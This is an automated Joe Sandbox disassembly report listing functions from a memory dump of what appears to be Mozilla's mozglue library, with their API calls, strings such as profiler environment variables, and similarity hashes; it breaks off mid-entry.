Opcode Fuzzy Hash: 76ab2ef8ce3988ff52b44eae467c489ed848e8d3c4475d0dd79d491e7a832516
Instruction Fuzzy Hash: 14F0C871E14786ABD7008F21C848675B778FFEA259F21431AF90553601E7B0B5D087D0

Function 6C9B1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C9B1800

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

Part of subcall function 6C954290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C993EBD,6C993EBD,00000000), ref: 6C9542A9

Strings

name, xrefs: 6C9B1939
{marker.name} - {marker.data.name}, xrefs: 6C9B18C7
Details, xrefs: 6C9B1925

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 4231e0a11399b0c4c4868549376d3a8248ead0c0779888b87e3bcf2687763d52
Instruction ID: 1de2c175628950b3e8329f3e1e164063d893c19d0b58e369796bb8960a16bb0a
Opcode Fuzzy Hash: 4231e0a11399b0c4c4868549376d3a8248ead0c0779888b87e3bcf2687763d52
Instruction Fuzzy Hash: E171F370A00746AFDB04CF28D4547AABBB1FF96304F144669D8156BB41D770F6A8CBE2

Function 6C9BB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C9BB0A6,6C9BB0A6,?,6C9BAF67,?,00000010,?,6C9BAF67,?,00000010,00000000,?,?,6C9BAB1F), ref: 6C9BB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C9BB0A6,6C9BB0A6,?,6C9BAF67,?,00000010,?,6C9BAF67,?,00000010,00000000,?), ref: 6C9BB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C9BB0A6,6C9BB0A6,?,6C9BAF67,?,00000010,?,6C9BAF67,?,00000010), ref: 6C9BB25F

Strings

map/set<T> too long, xrefs: 6C9BB1FA

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 4e0aefa0776b7e292eb929419ec296662936d41e262a54c020957fd4fa223757
Instruction ID: 4a4603a7d1e5e7d7421034512c898cbe4ec187cd7a755dd276200a9e6f48cd4c
Opcode Fuzzy Hash: 4e0aefa0776b7e292eb929419ec296662936d41e262a54c020957fd4fa223757
Instruction Fuzzy Hash: 16619B34A04645AFD701CF19C8C0AAABBF5FF5A318F18C199D8596BB92C331ED45CBA1

Function 6C97D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

EnterCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D4F2
LeaveCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D50B

Part of subcall function 6C95CFE0: EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C95CFF6
Part of subcall function 6C95CFE0: LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C95D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D52E
EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C97D690
LeaveCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D751

Strings

MOZ_CRASH(), xrefs: 6C97D4BB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 0b7aa2efba07af118b59c0234a96f7df558bdb328f82750e82ae65621693f3d9
Instruction ID: f9f543cec5f736f840e44c4afaa4b3c93be4990638b3fcf7df3b732be643161b
Opcode Fuzzy Hash: 0b7aa2efba07af118b59c0234a96f7df558bdb328f82750e82ae65621693f3d9
Instruction Fuzzy Hash: 3251E472A09B018FD364CF28C49461AB7F5EF89704F658A2ED59AD7F84D770E840CBA1

Function 6C9A4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C9A4721

Strings

., xrefs: 6C9A476A
profiler-paused, xrefs: 6C9A46E4
-%llu, xrefs: 6C9A4733

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 7d1a4bc01b6cbc658f199ac67f253fe15ef784f79cf080546d57d987c6a64946
Instruction ID: 67011499d8f742636df381e94102677f708fd7904b0e273f046bf3f9743fba7a
Opcode Fuzzy Hash: 7d1a4bc01b6cbc658f199ac67f253fe15ef784f79cf080546d57d987c6a64946
Instruction Fuzzy Hash: E8415972E087089BCB08DFB8D85115EBBF5EF95748F20863EE85567B91EB30D8458B42

Function 6C9C9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C9C985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C9C987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C9C98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C9C98D9

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 40dd1b8b40d3e8ede8825237144d63a6a122664f827e3f8db5bd0293336436b1
Instruction ID: 2cf4ae1a34839c51d96f1ec3af381cdd371011078c8e76c7a7e0d3eb52ce9f3d
Opcode Fuzzy Hash: 40dd1b8b40d3e8ede8825237144d63a6a122664f827e3f8db5bd0293336436b1
Instruction Fuzzy Hash: 0B310A71B002089FDB14AF59DC455EE77A9DF54718F50846DEA06ABB80DB31E904CBD2

Function 6C9A46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C9A4721

Part of subcall function 6C954410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C993EBD,00000017,?,00000000,?,6C993EBD,?,?,6C9542D2), ref: 6C954444

Strings

., xrefs: 6C9A476A
profiler-paused, xrefs: 6C9A46E4
-%llu, xrefs: 6C9A4733

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 8e513062b929a89b54a85ed2350b4cdaffecbb1bd69503736628948df1c82039
Instruction ID: 1bec9da7a1a0f8f8537b0094bf35a97c28dd057798e076457a247e29aed8c295
Opcode Fuzzy Hash: 8e513062b929a89b54a85ed2350b4cdaffecbb1bd69503736628948df1c82039
Instruction Fuzzy Hash: C2313971F043084BCB0CCFACD8812ADBBE6DB99714F55853EE8059BB41EB70D9458B51

Function 6C9AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C954290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C993EBD,6C993EBD,00000000), ref: 6C9542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C9AB127), ref: 6C9AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C9AB4E4

Strings

pid:, xrefs: 6C9AB4DE

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: d02b22acb0bc9cdb789ad10cc11b9f0c9a6c4aa96de36fec541bba084984be0b
Instruction ID: 7d39cca18616ff65ba02868df991634079e195447791591a041a36154c5c891f
Opcode Fuzzy Hash: d02b22acb0bc9cdb789ad10cc11b9f0c9a6c4aa96de36fec541bba084984be0b
Instruction Fuzzy Hash: A3312131A0120CDFDB00DFE9D880AEEB7B9FF05318F540529D90167A81D732E88ACBA1

Function 6C99E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C99E577
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99E584
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C99E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C99E826, 6C99E850
MOZ_PROFILER_STARTUP, xrefs: 6C99E5A1, 6C99E5CC, 6C99E5FF, 6C99E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C99E722, 6C99E750, 6C99E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C99E777
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C99E655

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: cff65f50e53103f362ce9ba93de695206569c6997d784dd6d3388b9ab68587f9
Instruction ID: 8ce947244d5cbc10c64b9c5882184560a2a2ae75396da08a335d8b8f0829866d
Opcode Fuzzy Hash: cff65f50e53103f362ce9ba93de695206569c6997d784dd6d3388b9ab68587f9
Instruction Fuzzy Hash: E211A131608B54DFCB009F15C849B59BBB8FB8932DF254519E94567A50C770F884CBD1

Function 6C9A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9A0CD5

Part of subcall function 6C98F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C98F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9A0D40
free.MOZGLUE ref: 6C9A0DCB

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

free.MOZGLUE ref: 6C9A0DDD
free.MOZGLUE ref: 6C9A0DF2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 0d978a4cfd0547df25233c8c2ea475f30d0db58acc2b2a11a62c3ee0755f98d6
Instruction ID: 8b6228db4b23bef3e1e6a4d1db5b717f2f806b281f9c4a3e2c91d2a6705c6c9f
Opcode Fuzzy Hash: 0d978a4cfd0547df25233c8c2ea475f30d0db58acc2b2a11a62c3ee0755f98d6
Instruction Fuzzy Hash: 8A413572A097809BD320CF29C08039EFBE5BF98614F119A2EE8D987B50D770E445CB82

Function 6C990800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C990838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C99084C
EnterCriticalSection.KERNEL32(?), ref: 6C9908AF
LeaveCriticalSection.KERNEL32(?), ref: 6C9908BD
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C9908D5

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 847f76282d066539a08ffb6f0fd6e8202346187db3a98a0fe5eb6cef1808141d
Instruction ID: 5d66724608351e1b8e152e020084574ade333fcedd537deb69491c5a7c919f5d
Opcode Fuzzy Hash: 847f76282d066539a08ffb6f0fd6e8202346187db3a98a0fe5eb6cef1808141d
Instruction Fuzzy Hash: EB21B331B0564A9BEB048F66D844BAEB779AF49708F680568D519B7A40DB32E844CBD0

Function 6C9ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9ACDA4

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

Part of subcall function 6C9AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C9ACDBA,00100000,?,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9AD158
Part of subcall function 6C9AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C9ACDBA,00100000,?,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9ACDC4

Part of subcall function 6C9A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C9B15FC,?,?,?,?,6C9B15FC,?), ref: 6C9A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9ACECC

Part of subcall function 6C96CA10: mozalloc_abort.MOZGLUE(?), ref: 6C96CAA2

Part of subcall function 6C99CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C9ACEEA,?,?,?,?,00000000,?,6C99DA31,00100000,?,?,00000000), ref: 6C99CB57
Part of subcall function 6C99CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C99CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C9ACEEA,?,?), ref: 6C99CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C99DA31,00100000,?,?,00000000,?), ref: 6C9AD058

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 21ab459e2694be5d92007f9fc188c5177eff413676b63e37775e5b056bf0d785
Instruction ID: e13b5ba873cb11a38f191cfca532ba899a9c01f1d82dbc39d27802f7eb277510
Opcode Fuzzy Hash: 21ab459e2694be5d92007f9fc188c5177eff413676b63e37775e5b056bf0d785
Instruction Fuzzy Hash: ECD16F71A04B56DFD708CF28C4807A9F7E1BF99308F05862DD8598B751EB31E9A5CB81

Function 6C961720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C9617B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C9618EE
free.MOZGLUE(?), ref: 6C961911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C96194C

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 12d6be15841c6c0ece9b719a04f1b84cbad1ca020cf3b534e317b819b391aeff
Instruction ID: e1d8d6752d8c89da296225dcf8104f89744ad6ff8dd53e8bf47747fb72a66d02
Opcode Fuzzy Hash: 12d6be15841c6c0ece9b719a04f1b84cbad1ca020cf3b534e317b819b391aeff
Instruction Fuzzy Hash: A181E770A152059FDB08CF69D8D45BEBBB1FF8A310F04456DE811ABB90D730E854CBA2

Function 6C975C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C975D40
EnterCriticalSection.KERNEL32(6C9DF688), ref: 6C975D67
__aulldiv.LIBCMT ref: 6C975DB4
LeaveCriticalSection.KERNEL32(6C9DF688), ref: 6C975DED

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 1848d507069d5ab967d3f2ef7fb882371dae29ac8d10ad724a742759ff74307b
Instruction ID: 1f87f39f8e3ef7c84aa57ec3eef4dbb2e3f64417e9166057b9da5a500d700b55
Opcode Fuzzy Hash: 1848d507069d5ab967d3f2ef7fb882371dae29ac8d10ad724a742759ff74307b
Instruction Fuzzy Hash: 77518D71E055198FCF08CF68C955BAEBBB1FB89308F298619D811B7B50C730B985CB90

Function 6C95CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C95CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C95CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C95CF4E

Strings

0, xrefs: 6C95CF30

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 0e851ffa705033111940aa1c33e4e3d91d700d23ea7ee9f0b9783dfe3b6a0d03
Instruction ID: dc4f0ea235c2803fa0aad74319c0a12519226d35278ffde2eabba60f27fc35f0
Opcode Fuzzy Hash: 0e851ffa705033111940aa1c33e4e3d91d700d23ea7ee9f0b9783dfe3b6a0d03
Instruction Fuzzy Hash: CE510375A042568FCB00CF18C890A9ABBB5EF99300F19859DDC595F751D731ED16CBE0

Function 6C9B77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9B77FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C9B7829

Part of subcall function 6C98CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C9531A7), ref: 6C98CC45
Part of subcall function 6C98CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C9531A7), ref: 6C98CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9B789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9B78CF

Part of subcall function 6C954DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C954E5A
Part of subcall function 6C954DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C954E97

Part of subcall function 6C954290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C993EBD,6C993EBD,00000000), ref: 6C9542A9

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: caf3e7704822f2addaf2677514d346225285f95a206d5c06274acda0d33bd75b
Instruction ID: f052142582ff73968bc6d3a7b89b9dc90c6ff24a43dcf738ae1e8fc1bf822f00
